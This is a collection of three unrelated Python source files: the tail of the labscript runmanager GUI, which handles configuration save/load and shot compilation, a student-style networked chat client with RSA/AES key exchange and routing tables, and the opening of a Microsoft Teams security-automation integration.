message = 'Revert configuration to the last saved state in \'%s\'?' % self.last_save_config_file
reply = QtWidgets.QMessageBox.question(self.ui, 'Load configuration', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return
elif reply == QtWidgets.QMessageBox.Yes:
self.load_configuration(self.last_save_config_file)
else:
error_dialog('no changes to revert')
def on_save_configuration_as_triggered(self):
if self.last_save_config_file is not None:
default = self.last_save_config_file
else:
default = os.path.join(self.exp_config.get('paths', 'experiment_shot_storage'), 'runmanager.ini')
save_file = QtWidgets.QFileDialog.getSaveFileName(self.ui,
'Select file to save current runmanager configuration',
default,
"config files (*.ini)")
if type(save_file) is tuple:
save_file, _ = save_file
if not save_file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
save_file = os.path.abspath(save_file)
self.save_configuration(save_file)
def get_save_data(self):
# Get the currently open files and active groups:
h5_files_open = []
active_groups = []
for i in range(self.groups_model.rowCount()):
file_name_item = self.groups_model.item(i, self.GROUPS_COL_NAME)
globals_file_name = file_name_item.text()
h5_files_open.append(globals_file_name)
for j in range(file_name_item.rowCount()):
group_name_item = file_name_item.child(j, self.GROUPS_COL_NAME)
group_name = group_name_item.text()
group_active_item = file_name_item.child(j, self.GROUPS_COL_ACTIVE)
if group_active_item.checkState() == QtCore.Qt.Checked:
active_groups.append((globals_file_name, group_name))
# Get the currently open groups:
groups_open = []
for i in range(self.ui.tabWidget.count()):
tab_page = self.ui.tabWidget.widget(i)
for (globals_file_name, group_name), group_tab in self.currently_open_groups.items():
if group_tab.ui is tab_page:
groups_open.append((globals_file_name, group_name))
break
# Get the labscript file, output folder, and whether the output folder
# is default:
current_labscript_file = self.ui.lineEdit_labscript_file.text()
shot_output_folder = self.ui.lineEdit_shot_output_folder.text()
is_using_default_shot_output_folder = (shot_output_folder == self.get_default_output_folder())
# Only save the shot output folder if not using the default, that way
# the folder updating as the day rolls over will not be detected as a
# change to the save data:
if is_using_default_shot_output_folder:
shot_output_folder = ''
# Get the server hostnames:
BLACS_host = self.ui.lineEdit_BLACS_hostname.text()
send_to_runviewer = self.ui.checkBox_view_shots.isChecked()
send_to_BLACS = self.ui.checkBox_run_shots.isChecked()
shuffle = self.ui.pushButton_shuffle.isChecked()
# axes tab information
axes = []
for i in range(self.axes_model.rowCount()):
name_item = self.axes_model.item(i, self.AXES_COL_NAME)
shuffle_item = self.axes_model.item(i, self.AXES_COL_SHUFFLE)
shuffle_state = shuffle_item.checkState()
axes.append((name_item.data(self.AXES_ROLE_NAME), 1 if shuffle_state == QtCore.Qt.Checked else 0))
save_data = {'h5_files_open': h5_files_open,
'active_groups': active_groups,
'groups_open': groups_open,
'current_labscript_file': current_labscript_file,
'shot_output_folder': shot_output_folder,
'is_using_default_shot_output_folder': is_using_default_shot_output_folder,
'send_to_runviewer': send_to_runviewer,
'send_to_BLACS': send_to_BLACS,
'shuffle': shuffle,
'axes': axes,
'BLACS_host': BLACS_host}
return save_data
def save_configuration(self, save_file):
runmanager_config = LabConfig(save_file)
save_data = self.get_save_data()
self.last_save_config_file = save_file
self.last_save_data = save_data
for key, value in save_data.items():
runmanager_config.set('runmanager_state', key, pprint.pformat(value))
def on_load_configuration_triggered(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
message = ('Current configuration (which groups are active/open and other GUI state) '
'has changed: save config file \'%s\'?' % self.last_save_config_file)
reply = QtWidgets.QMessageBox.question(self.ui, 'Load configuration', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return
if reply == QtWidgets.QMessageBox.Yes:
self.save_configuration(self.last_save_config_file)
if self.last_save_config_file is not None:
default = self.last_save_config_file
else:
default = os.path.join(self.exp_config.get('paths', 'experiment_shot_storage'), 'runmanager.ini')
file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select runmanager configuration file to load',
default,
"config files (*.ini)")
if type(file) is tuple:
file, _ = file
if not file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
file = os.path.abspath(file)
self.load_configuration(file)
def load_configuration(self, filename):
self.last_save_config_file = filename
self.ui.actionSave_configuration.setText('Save configuration %s'%filename)
# Close all files:
save_data = self.get_save_data()
for globals_file in save_data['h5_files_open']:
self.close_globals_file(globals_file, confirm=False)
# Ensure folder exists, if this was opened programmatically we are
# creating the file, so the directory had better exist!
mkdir_p(os.path.dirname(filename))
runmanager_config = LabConfig(filename)
has_been_a_warning = [False]
def warning(message):
if not has_been_a_warning[0]:
has_been_a_warning[0] = True
self.output_box.output('\n')
self.output_box.output('Warning: %s\n' % message, red=True)
try:
h5_files_open = ast.literal_eval(runmanager_config.get('runmanager_state', 'h5_files_open'))
except Exception:
pass
else:
for globals_file in h5_files_open:
if os.path.exists(globals_file):
try:
self.open_globals_file(globals_file)
self.last_opened_globals_folder = os.path.dirname(globals_file)
except Exception:
zprocess.raise_exception_in_thread(sys.exc_info())
continue
else:
self.output_box.output('\nWarning: globals file %s no longer exists\n' % globals_file, red=True)
try:
active_groups = ast.literal_eval(runmanager_config.get('runmanager_state', 'active_groups'))
except Exception:
pass
else:
for globals_file, group_name in active_groups:
try:
group_active_item = self.get_group_item_by_name(globals_file, group_name, self.GROUPS_COL_ACTIVE)
group_active_item.setCheckState(QtCore.Qt.Checked)
except LookupError:
warning("previously active group '%s' in %s no longer exists" % (group_name, globals_file))
try:
groups_open = ast.literal_eval(runmanager_config.get('runmanager_state', 'groups_open'))
except Exception:
pass
else:
for globals_file, group_name in groups_open:
# First check if it exists:
try:
self.get_group_item_by_name(globals_file, group_name, self.GROUPS_COL_NAME)
except LookupError:
warning("previously open group '%s' in %s no longer exists" % (group_name, globals_file))
else:
self.open_group(globals_file, group_name)
try:
current_labscript_file = ast.literal_eval(
runmanager_config.get('runmanager_state', 'current_labscript_file'))
except Exception:
pass
else:
if os.path.exists(current_labscript_file):
self.ui.lineEdit_labscript_file.setText(current_labscript_file)
self.last_opened_labscript_folder = os.path.dirname(current_labscript_file)
elif current_labscript_file:
warning('previously selected labscript file %s no longer exists' % current_labscript_file)
try:
shot_output_folder = ast.literal_eval(runmanager_config.get('runmanager_state', 'shot_output_folder'))
except Exception:
pass
else:
self.ui.lineEdit_shot_output_folder.setText(shot_output_folder)
self.last_selected_shot_output_folder = os.path.dirname(shot_output_folder)
try:
is_using_default_shot_output_folder = ast.literal_eval(
runmanager_config.get('runmanager_state', 'is_using_default_shot_output_folder'))
except Exception:
pass
else:
if is_using_default_shot_output_folder:
default_output_folder = self.get_default_output_folder()
self.ui.lineEdit_shot_output_folder.setText(default_output_folder)
self.last_selected_shot_output_folder = os.path.dirname(default_output_folder)
try:
send_to_runviewer = ast.literal_eval(runmanager_config.get('runmanager_state', 'send_to_runviewer'))
except Exception:
pass
else:
self.ui.checkBox_view_shots.setChecked(send_to_runviewer)
try:
send_to_BLACS = ast.literal_eval(runmanager_config.get('runmanager_state', 'send_to_BLACS'))
except Exception:
pass
else:
self.ui.checkBox_run_shots.setChecked(send_to_BLACS)
# clear the axes model first
if self.axes_model.rowCount():
self.axes_model.removeRows(0, self.axes_model.rowCount())
# set the state of the global shuffle button. This ensure that if no axes items get loaded afterwards
# (e.g. because the globals in the .ini file are no longer expansion globals), then we still have
# an approximate state for the shuffle button that will apply to whatever globals are to be expanded.
try:
shuffle = ast.literal_eval(runmanager_config.get('runmanager_state', 'shuffle'))
except Exception:
pass
else:
if shuffle:
self.ui.pushButton_shuffle.setChecked(True)
# Now load the axes states (order and shuffle). This will also ensure the shuffle button matches the
# state of these items (since we don't save/restore the tri-state nature of the global shuffle button
try:
axes = ast.literal_eval(runmanager_config.get('runmanager_state', 'axes'))
except Exception:
pass
else:
if isinstance(axes, list):
# clear model
for name, shuffle in axes:
self.add_item_to_axes_model(name, shuffle)
self.update_axes_indentation()
try:
BLACS_host = ast.literal_eval(runmanager_config.get('runmanager_state', 'BLACS_host'))
except Exception:
pass
else:
self.ui.lineEdit_BLACS_hostname.setText(BLACS_host)
# Set as self.last_save_data:
save_data = self.get_save_data()
self.last_save_data = save_data
self.ui.actionSave_configuration_as.setEnabled(True)
self.ui.actionRevert_configuration.setEnabled(True)
def compile_loop(self):
while True:
try:
labscript_file, run_files, send_to_BLACS, BLACS_host, send_to_runviewer = self.compile_queue.get()
run_files = iter(run_files) # Should already be in iterator but just in case
while True:
if self.compilation_aborted.is_set():
self.output_box.output('Compilation aborted.\n\n', red=True)
break
try:
try:
# We do .next() instead of looping over run_files
# so that if compilation is aborted we won't
# create an extra file unnecessarily.
run_file = run_files.next()
except StopIteration:
self.output_box.output('Ready.\n\n')
break
else:
self.to_child.put(['compile', [labscript_file, run_file]])
signal, success = self.from_child.get()
assert signal == 'done'
if not success:
self.compilation_aborted.set()
continue
if send_to_BLACS:
self.send_to_BLACS(run_file, BLACS_host)
if send_to_runviewer:
self.send_to_runviewer(run_file)
except Exception as e:
self.output_box.output(str(e) + '\n', red=True)
self.compilation_aborted.set()
inmain(self.ui.pushButton_abort.setEnabled, False)
self.compilation_aborted.clear()
except Exception:
# Raise it so whatever bug it is gets seen, but keep going so
# the thread keeps functioning:
exc_info = sys.exc_info()
zprocess.raise_exception_in_thread(exc_info)
continue
def parse_globals(self, active_groups, raise_exceptions=True, expand_globals=True, expansion_order = None, return_dimensions = False):
sequence_globals = runmanager.get_globals(active_groups)
#logger.info('got sequence globals')
evaled_globals, global_hierarchy, expansions = runmanager.evaluate_globals(sequence_globals, raise_exceptions)
#logger.info('evaluated sequence globals')
if expand_globals:
if return_dimensions:
shots, dimensions = runmanager.expand_globals(sequence_globals, evaled_globals, expansion_order, return_dimensions=return_dimensions)
else:
shots = runmanager.expand_globals(sequence_globals, evaled_globals, expansion_order)
else:
shots = []
dimensions = {}
#logger.info('expanded sequence globals')
if return_dimensions:
return sequence_globals, shots, evaled_globals, global_hierarchy, expansions, dimensions
else:
return sequence_globals, shots, evaled_globals, global_hierarchy, expansions
def guess_expansion_modes(self, active_groups, evaled_globals, global_hierarchy, expansions):
"""This function is designed to be called iteratively. It changes the
expansion type of globals that reference other globals - such that
globals referencing an iterable global will be zipped with it, rather
than outer producted. Each time this method is called,
self.parse_globals should also be called, so that the globals are
evaluated with their new expansion modes, if they changed. This should
be performed repeatedly until there are no more changes. Note that
this method does not return what expansion types it thinks globals
should have - it *actually writes them to the globals HDF5 file*. So
it is up to later code to ensure it re-reads the expansion mode from
the HDF5 file before proceeding. At present this method is only called
from self.preparse_globals(), so see there to see how it fits in with
everything else. This method uses four instance attributes to store
state: self.previous_evaled_globals, self.previous_global_hierarchy,
self.previous_expansion_types and self.previous_expansions. This is
neccesary so that it can detect changes."""
# Do nothing if there were exceptions:
for group_name in evaled_globals:
for global_name in evaled_globals[group_name]:
value = evaled_globals[group_name][global_name]
if isinstance(value, Exception):
# Let ExpansionErrors through through, as they occur
# when the user has changed the value without changing
# the expansion type:
if isinstance(value, runmanager.ExpansionError):
continue
return False
# Did the guessed expansion type for any of the globals change?
expansion_types_changed = False
expansion_types = {}
for group_name in evaled_globals:
for global_name in evaled_globals[group_name]:
new_value = evaled_globals[group_name][global_name]
try:
previous_value = self.previous_evaled_globals[group_name][global_name]
except KeyError:
# This variable is used to guess the expansion type
#
# If we already have an expansion specified for this, but
# don't have a previous value, then we should use the
# new_value for the guess as we are likely loading from HDF5
# file for the first time (and either way, don't want to
# overwrite what the user has put in the expansion type)
#
# If we don't have an expansion...
# then we set it to '0' which will result in an
# expansion type guess of '' (emptys string) This will
# either result in nothing being done to the expansion
# type or the expansion type being found to be 'outer',
# which will then make it go through the machinery below
if global_name in expansions and expansions[global_name]:
previous_value = new_value
else:
previous_value = 0
new_guess = runmanager.guess_expansion_type(new_value)
previous_guess = runmanager.guess_expansion_type(previous_value)
if new_guess == 'outer':
expansion_types[global_name] = {'previous_guess': previous_guess,
'new_guess': new_guess,
'group_name': group_name,
'value': new_value
}
elif new_guess != previous_guess:
filename = active_groups[group_name]
runmanager.set_expansion(filename, group_name, global_name, new_guess)
expansions[global_name] = new_guess
expansion_types_changed = True
# recursively find dependencies and add them to a zip group!
def find_dependencies(global_name, global_hierarchy, expansion_types):
results = set()
for name, dependencies in global_hierarchy.items():
if name in expansion_types and global_name in dependencies:
results.add(name)
results = results.union(find_dependencies(name, global_hierarchy, expansion_types))
return results
def global_depends_on_global_with_outer_product(global_name, global_hierarchy, expansions):
if global_name not in global_hierarchy:
return False
else:
for dependency in global_hierarchy[global_name]:
if expansions[dependency]:
return True
def set_expansion_type_guess(expansion_types, expansions, global_name, expansion_to_set, new=True):
if new:
key = 'new_guess'
else:
key = 'previous_guess'
# debug logging
log_if_global(global_name, [], 'setting expansion type for new dependency' if new else 'setting expansion type for old dependencies')
# only do this if the expansion is *not* already set to a specific zip group
if global_name in expansions and expansions[global_name] != '' and expansions[global_name] != 'outer':
expansion_types[global_name][key] = expansions[global_name]
# debug logging
log_if_global(global_name, [], 'Using existing expansion %s for %s'%(expansions[global_name], global_name))
else:
expansion_types[global_name][key] = expansion_to_set
expansions[global_name] = expansion_to_set
# debug logging
log_if_global(global_name, [], 'Using existing expansion %s for %s'%(expansion_to_set, global_name))
for global_name in sorted(expansion_types):
# we have a global that does not depend on anything that has an
# expansion type of 'outer'
if (not global_depends_on_global_with_outer_product(global_name, global_hierarchy, expansions)
and not isinstance(expansion_types[global_name]['value'], runmanager.ExpansionError)):
current_dependencies = find_dependencies(global_name, global_hierarchy, expansion_types)
# if this global has other globals that use it, then add them
# all to a zip group with the name of this global
if current_dependencies:
for dependency in current_dependencies:
set_expansion_type_guess(expansion_types, expansions, dependency, str(global_name))
set_expansion_type_guess(expansion_types, expansions, global_name, str(global_name))
for global_name in sorted(self.previous_expansion_types):
if (not global_depends_on_global_with_outer_product(
global_name, self.previous_global_hierarchy, self.previous_expansions)
and not isinstance(self.previous_expansion_types[global_name]['value'], runmanager.ExpansionError)):
old_dependencies = find_dependencies(global_name, self.previous_global_hierarchy, self.previous_expansion_types)
# if this global has other globals that use it, then add them
# all to a zip group with the name of this global
if old_dependencies:
for dependency in old_dependencies:
if dependency in expansion_types:
set_expansion_type_guess(expansion_types, self.previous_expansions, dependency, str(global_name), new=False)
if global_name in expansion_types:
set_expansion_type_guess(expansion_types, self.previous_expansions, global_name, str(global_name), new=False)
for global_name, guesses in expansion_types.items():
if guesses['new_guess'] != guesses['previous_guess']:
filename = active_groups[guesses['group_name']]
runmanager.set_expansion(
filename, str(guesses['group_name']), str(global_name), str(guesses['new_guess']))
expansions[global_name] = guesses['new_guess']
expansion_types_changed = True
# Now check everything that has an expansion type not equal to outer.
# If it has one, but is not iteratble, remove it from teh zip group
for group_name in evaled_globals:
for global_name in evaled_globals[group_name]:
if expansions[global_name] and expansions[global_name] != 'outer':
try:
iter(evaled_globals[group_name][global_name])
except Exception:
filename = active_groups[group_name]
runmanager.set_expansion(filename, group_name, global_name, '')
expansion_types_changed = True
self.previous_evaled_globals = evaled_globals
self.previous_global_hierarchy = global_hierarchy
self.previous_expansion_types = expansion_types
self.previous_expansions = expansions
return expansion_types_changed
def make_h5_files(self, labscript_file, output_folder, sequence_globals, shots, shuffle):
mkdir_p(output_folder) # ensure it exists
sequence_id = runmanager.generate_sequence_id(labscript_file)
run_files = runmanager.make_run_files(output_folder, sequence_globals, shots, sequence_id, shuffle)
logger.debug(run_files)
return labscript_file, run_files
def send_to_BLACS(self, run_file, BLACS_hostname):
port = int(self.exp_config.get('ports', 'BLACS'))
agnostic_path = shared_drive.path_to_agnostic(run_file)
self.output_box.output('Submitting run file %s.\n' % os.path.basename(run_file))
try:
response = zprocess.zmq_get(port, BLACS_hostname, data=agnostic_path)
if 'added successfully' in response:
self.output_box.output(response)
else:
raise Exception(response)
except Exception as e:
self.output_box.output('Couldn\'t submit job to control server: %s\n' % str(e), red=True)
self.compilation_aborted.set()
def send_to_runviewer(self, run_file):
runviewer_port = int(self.exp_config.get('ports', 'runviewer'))
agnostic_path = shared_drive.path_to_agnostic(run_file)
try:
response = zprocess.zmq_get(runviewer_port, 'localhost', data='hello', timeout=1)
if 'hello' not in response:
raise Exception(response)
except Exception as e:
logger.info('runviewer not running, attempting to start...')
# Runviewer not running, start it:
if os.name == 'nt':
creationflags = 0x00000008 # DETACHED_PROCESS from the win32 API
subprocess.Popen([sys.executable, '-m', 'runviewer'],
creationflags=creationflags, stdout=None, stderr=None,
close_fds=True)
else:
devnull = open(os.devnull, 'w')
if not os.fork():
os.setsid()
subprocess.Popen([sys.executable, '-m', 'runviewer'],
stdin=devnull, stdout=devnull, stderr=devnull, close_fds=True)
os._exit(0)
try:
zprocess.zmq_get(runviewer_port, 'localhost', data='hello', timeout=15)
except Exception as e:
self.output_box.output('Couldn\'t submit shot to runviewer: %s\n\n' % str(e), red=True)
try:
response = zprocess.zmq_get(runviewer_port, 'localhost', data=agnostic_path, timeout=0.5)
if 'ok' not in response:
raise Exception(response)
else:
self.output_box.output('Shot %s sent to runviewer.\n' % os.path.basename(run_file))
except Exception as e:
self.output_box.output('Couldn\'t submit shot to runviewer: %s\n\n' % str(e), red=True)
if __name__ == "__main__":
logger = setup_logging('runmanager')
labscript_utils.excepthook.set_logger(logger)
logger.info('\n\n===============starting===============\n')
qapplication = KeyPressQApplication(sys.argv)
qapplication.setAttribute(QtCore.Qt.AA_DontShowIconsInMenus, False)
app = RunManager()
qapplication.keyPress.connect(app.on_keyPress)
qapplication.keyRelease.connect(app.on_keyRelease)
sys.exit(qapplication.exec_())
|
client_helper.py
|
import json
import pickle
import sys
import time
from threading import Thread
from random import Random
from bitarray import bitarray
from bitarray.util import hex2ba, ba2hex
from chat_bot import Bot
from udp_handler import Tracker
from chat_client import Chat
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.PublicKey import RSA
class ClientHelper:
def __init__(self, client):
self.client = client
self.client_id = -1
self.username = ""
self.menu_table = {}
self.connected = False
self.option = -1
self.udp_tracker = None
self.udp_binding = ()
self.keys = RSA.generate(2048)
self.chat_channel = None
self.private_key = None
self.public_key = None
self.chat_private_key = None
self.chat_public_key = None
self.bot = None
self.botPresent = False
self.botName = ''
self.botOptions = ''
def create_request(self, option=0):
"""
:return: the created request
"""
request = {'payload': None, 'headers': {}}
if option == 0 and not self.connected: # Even though logic checks are performed elsewhere this is just a backup
# initial connection request
request = {'payload': None, 'headers': {'option': 0, 'username': self.username}}
return request
elif option == 1:
request = {'payload': None, 'headers': {'option': 1}}
return request
elif option == 2:
# create a request using the message and recipient
message = input('Enter your message: ')
recipient = int(input('Enter recipient id: '))
request = {'payload': message,
'headers': {'option': 2, 'recipient': ('127.0.0.1', recipient)}}
return request
elif option == 3:
request = {'payload': None, 'headers': {'option': 3}}
elif option == 4:
binding = tuple(input("Enter the address to bind your UDP client (e.g. 127.0.0.1:9000): ").split(':'))
recipient = tuple(input("Enter the recipient address: ").split(':'))
message = input("Enter the message: ")
serialized_message = pickle.dumps(message)
if not self.udp_tracker:
self.udp_binding = binding
self.udp_tracker = Tracker(self.udp_binding)
else:
print(f'User has UDP client bound to {self.udp_binding}')
self.udp_tracker.send(serialized_message, recipient)
Thread(target=self.udp_handler(self.udp_tracker)).start()
request = {'payload': None, 'headers': {'option': 4}}
elif option == 5:
message = input("Enter message: ")
bit_message = self.cdma_encode(message)
request = {'payload': bit_message, 'headers': {'option': 5}}
elif option == 6:
channel = 0
while int(channel) < 100 or int(channel) > 65000:
channel = input("Enter the new channel ID: ")
self.chat_channel = channel
self.private_key = self.keys.export_key()
self.public_key = self.keys.public_key().export_key()
request = {'payload': None, 'headers': {'option': 6, 'channel': self.chat_channel, 'public_key': self.public_key}}
elif option == 7:
channel = 0
while int(channel) < 100 or int(channel) > 65000:
channel = input("Enter the new channel ID: ")
self.chat_channel = channel
self.private_key = self.keys.export_key()
self.public_key = self.keys.public_key().export_key()
request = {'payload': None, 'headers': {'option': 7, 'channel': self.chat_channel, 'public_key': self.public_key}}
elif option == 8:
name = input("Enter the name of your bot: ")
print('\nThe available permissions of this bot are:\n1. Welcome Users right after they join the channel.')
print('2. Show a warning to the user when they send words not allowed\n3. Drop users from the channel after 3 warnings')
print('4. Compute response time of a message when the user requests it\n5. Inform the user when it has been inactive for 5 minutes\n')
options = input("Enter integers (no spaces) to enable permission for bot: ")
request = {'payload': None, 'headers': {'option': 8, 'bot': name, 'options': options}}
elif option == 9:
request = {'payload': None, 'headers': {'option': 9}}
print("\nRouting table requested, waiting for response....\n\n")
elif option == 10:
request = {'payload': None, 'headers': {'option': 10}}
print("\nLink state table requested, waiting for response....\n\n")
elif option == 11:
request = {'payload': None, 'headers': {'option': 11}}
print("\nDistance vector table requested, waiting for response....\n\n")
elif option == 12:
request = {'payload': None, 'headers': {'option': 12}}
elif option == 13:
# disconnect from server
request = {'payload': None, 'headers': {'option': 13}}
return request
def send_request(self, request):
"""
:request: a request representing deserialized data.
"""
self.client.send(request)
def process_response(self):
"""
:response: the serialized response.
"""
data = self.client.receive()
# print(data)
if not self.connected and 'clientid' in data['headers']:
self.connected = True
self.client_id = data['headers']['clientid']
print(
"Your client info:\nClient Name: {}\nClient ID: {}".format(self.username, data['headers']['clientid']))
distances = self.update_table()
request = {'payload': distances, 'headers': {'option': 100}}
self.send_request(request)
self.process_response()
if data['ack'] == 0:
menu = data['payload']
self.menu_table = json.loads(menu)
if data['ack'] == 1:
print('\n')
for key, value in data['payload'].items():
print(f'{key}:{value}', sep=',')
elif data['ack'] == 2:
print("Message sent!")
elif data['ack'] == -2:
print("User is not available to message")
elif data['ack'] == 3:
missed_messages = 0
for key, value in data['payload'].items():
missed_messages = missed_messages + len(value)
if not data['payload']:
print('You have no new messages')
return
else:
print(f'Number of unread messages: {missed_messages}')
for message_list in data['payload'].values():
for message in message_list:
if isinstance(message[1], bitarray):
decoded_message = self.cdma_decode(message[1], message[3])
date_time = message[0].split("T")
print(f'{date_time[0]} {date_time[1]}: {decoded_message} ({message[2]})')
continue
else:
date_time = message[0].split("T")
print(f'{date_time[0]} {date_time[1]}: {message[1]} ({message[2]})')
elif data['ack'] == 4:
pass
elif data['ack'] == 5:
print("Message broadcast!")
elif data['ack'] == 6:
nonce = data['payload'][1]
enc_session = data['payload'][0]
cipherRSA = PKCS1_OAEP.new(RSA.import_key(self.private_key))
session = cipherRSA.decrypt(enc_session)
cipherAES = AES.new(session, AES.MODE_EAX, nonce)
key = cipherAES.decrypt_and_verify(data['payload'][3], data['payload'][2])
self.chat_private_key = key
self.chat_public_key = data['payload'][4]
print(f'\nPrivate key rec\'v from server and channel {self.chat_channel[1]} was created!')
chat = Chat(self.chat_channel, self.username, data['payload'], True)
thread = None
if self.botPresent:
self.bot.setPort(int(self.chat_channel))
thread = Thread(target=self.bot.run)
thread.start()
self.udp_handler(chat)
if thread:
thread.join(0.25)
self.bot.udpSocket.close()
elif data['ack'] == 7:
nonce = data['payload'][1]
enc_session = data['payload'][0]
cipherRSA = PKCS1_OAEP.new(RSA.import_key(self.private_key))
session = cipherRSA.decrypt(enc_session)
cipherAES = AES.new(session, AES.MODE_EAX, nonce)
key = cipherAES.decrypt_and_verify(data['payload'][3], data['payload'][2])
self.chat_private_key = key
self.chat_public_key = data['payload'][4]
chat = Chat(self.chat_channel, self.username, data['payload'], False, data['users'], data['admin'])
self.udp_handler(chat)
elif data['ack'] == 8:
print("\n\n")
self.botPresent = True
self.botName = data['name']
self.botOptions = data['options']
self.bot = Bot(int(9000), self.botOptions, self.botName)
elif data['ack'] == 9:
mapping = data['payload']
names = data['names']
i = 0
print('---------- Network Map ----------\n\n')
print("Mapping", end='\t\t\t')
for name in names:
print('{:^10s}'.format(name), end='\t\t')
print('\n')
for row in mapping:
print(names[i], end='\t\t|')
for col in row:
print('\t\t{}'.format(col), end='\t\t|')
print('\n')
i += 1
elif data['ack'] == 10:
mapping = data['payload']
names = data['names']
destination = data['destination']
routes = data['routes']
cost = data['cost']
for i in range(len(names)-1):
cost[i] = mapping[0][i + 1]
routes[i] = [destination[i]]
for j in range(1, len(names)):
currentCost = cost[j - 1]
for k in range(j, len(names) - 1):
if (mapping[j][k + 1] + mapping[0][k]) < currentCost:
temp = routes[j - 1].pop()
routes[j - 1].append(names[j + 1])
routes[j - 1].append(temp)
cost[j - 1] = mapping[j][k + 1] + mapping[0][k]
titles = ['Destination', 'Path', 'Cost']
print(f'Routing table for {self.username} (id:{self.client_id}) computed with Link State Protocol\n')
for title in titles:
print('\t{:^20s}'.format(title), end='\t|')
print('\n')
for i in range(len(destination)):
print('\t{:^20s}'.format(destination[i]), end='\t|')
print('\t{:^20s}'.format(str(routes[i])), end='\t|')
print('\t{:^20d}'.format(cost[i]), end='\t|')
print('\n')
elif data['ack'] == 11:
mapping = data['map']
names = data['names']
mPrime = data['payload']
i = 0
print('---------- Network Map ----------\n\n')
print("Mapping", end='\t\t\t')
for name in names:
print('{:^10s}'.format(name), end='\t\t')
print('\n')
for row in mapping:
print(names[i], end='\t\t|')
for col in row:
print('\t\t{}'.format(col), end='\t\t|')
print('\n')
i += 1
i = 0
print('Routing table computed with DVP:\n')
print("Mapping", end='\t\t\t')
for name in names:
print('{:^10s}'.format(name), end='\t\t')
print('\n')
for row in mPrime:
print(names[i], end='\t\t|')
for col in row:
print('\t\t{}'.format(col), end='\t\t|')
print('\n')
i += 1
elif data['ack'] == 12:
print("Might you consider a subscription to ExpressVPN today?")
elif data['ack'] == 13:
print("Closing connection...")
elif data['ack'] == 100:
print('Distance values updated in server...')
elif data['ack'] == -1:
print("Something went wrong, please try again...")
@staticmethod
def print_menu(menu):
print("\n\n")
for heading in menu['titles']:
print(heading)
for option, title in menu['options'].items():
print(option + ": " + title)
option = int(input("\n\nOption <Enter a number>: "))
while option not in range(1, 14):
option = int(input("\nInvalid entry, choose another option:"))
return option
@staticmethod
def udp_handler(tracker):
tracker.run()
def cdma_encode(self, message):
# standard 4-channel orthogonal codes from generic walsh table
codes = [[1, 1, 1, 1], [1, -1, 1, -1], [1, 1, -1, -1], [1, -1, -1, 1]]
userCode = codes[(self.client_id % 4)]
encoded_message = message.encode('utf-8')
raw_data = bitarray(hex2ba(encoded_message.hex()))
expanded_data = bitarray()
for bit in raw_data:
for i in range(4):
expanded_data.append(bit)
expanded_code = bitarray(bitarray(userCode) * len(encoded_message) * 8)
encrypted_message = expanded_code ^ expanded_data
return encrypted_message
@staticmethod
def cdma_decode(message, sender_id):
codes = [[1, 1, 1, 1], [1, -1, 1, -1], [1, 1, -1, -1], [1, -1, -1, 1]]
userCode = codes[(sender_id % 4)]
length = (len(message) // 4)
decryption_code = bitarray(bitarray(userCode) * length)
decrypted_stream = message ^ decryption_code
compressed_data = decrypted_stream[0::4]
message = ba2hex(compressed_data)
message = bytes.fromhex(message).decode('utf-8')
return message
''' data from routing table is simulated for 3 users other than current
this was done to expedite testing and minimize the need for VM instances
the rest of the table is simulated by the server so that link state and routing
tables can be computed
'''
@staticmethod
def update_table():
distance = [0]
for i in range(3):
rand = Random()
distance.append(rand.randint(1, 30))
return distance
def start(self):
"""
initialize process for ClientHelper
"""
self.username = input("Enter a username: ")
# used for quicker debugging
# self.username = "Jarett"
request = self.create_request()
self.send_request(request)
self.process_response()
while self.option != 13:
self.option = self.print_menu(self.menu_table)
request = self.create_request(self.option)
self.send_request(request)
self.process_response()
self.client.close()
time.sleep(2)
sys.exit()
|
MicrosoftTeams.py
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
''' IMPORTS '''
import requests
from distutils.util import strtobool
from flask import Flask, request, Response
from gevent.pywsgi import WSGIServer
import jwt
import time
from threading import Thread
from typing import Match, Union, Optional, cast, Dict, Any, List, Tuple
import re
from jwt.algorithms import RSAAlgorithm
from tempfile import NamedTemporaryFile
from traceback import format_exc
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
''' GLOBAL VARIABLES'''
PARAMS: dict = demisto.params()
BOT_ID: str = PARAMS.get('bot_id', '')
BOT_PASSWORD: str = PARAMS.get('bot_password', '')
USE_SSL: bool = not PARAMS.get('insecure', False)
APP: Flask = Flask('demisto-teams')
PLAYGROUND_INVESTIGATION_TYPE: int = 9
GRAPH_BASE_URL: str = 'https://graph.microsoft.com'
INCIDENT_TYPE: str = PARAMS.get('incidentType', '')
URL_REGEX: str = r'http[s]?://(?:[a-zA-Z]|[0-9]|[:/$_@.&+#-]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
ENTITLEMENT_REGEX: str = \
r'(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}'
MENTION_REGEX = r'^@([^@;]+);| @([^@;]+);'
ENTRY_FOOTER: str = 'From Microsoft Teams'
INCIDENT_NOTIFICATIONS_CHANNEL = 'incidentNotificationChannel'
MESSAGE_TYPES: dict = {
'mirror_entry': 'mirrorEntry',
'incident_opened': 'incidentOpened',
'status_changed': 'incidentStatusChanged'
}
''' HELPER FUNCTIONS '''
def epoch_seconds(d: datetime = None) -> int:
"""
Return the number of seconds for given date. If no date, return current.
:param d: timestamp datetime object
:return: timestamp in epoch
"""
if not d:
d = datetime.utcnow()
return int((d - datetime.utcfromtimestamp(0)).total_seconds())
def error_parser(resp_err: requests.Response, api: str = 'graph') -> str:
"""
Parses Microsoft API error message from Requests response
:param resp_err: response with error
:param api: API to query (graph/bot)
:return: string of error
"""
try:
response: dict = resp_err.json()
if api == 'graph':
error: dict = response.get('error', {})
err_str: str = f"{error.get('code', '')}: {error.get('message', '')}"
if err_str:
return err_str
elif api == 'bot':
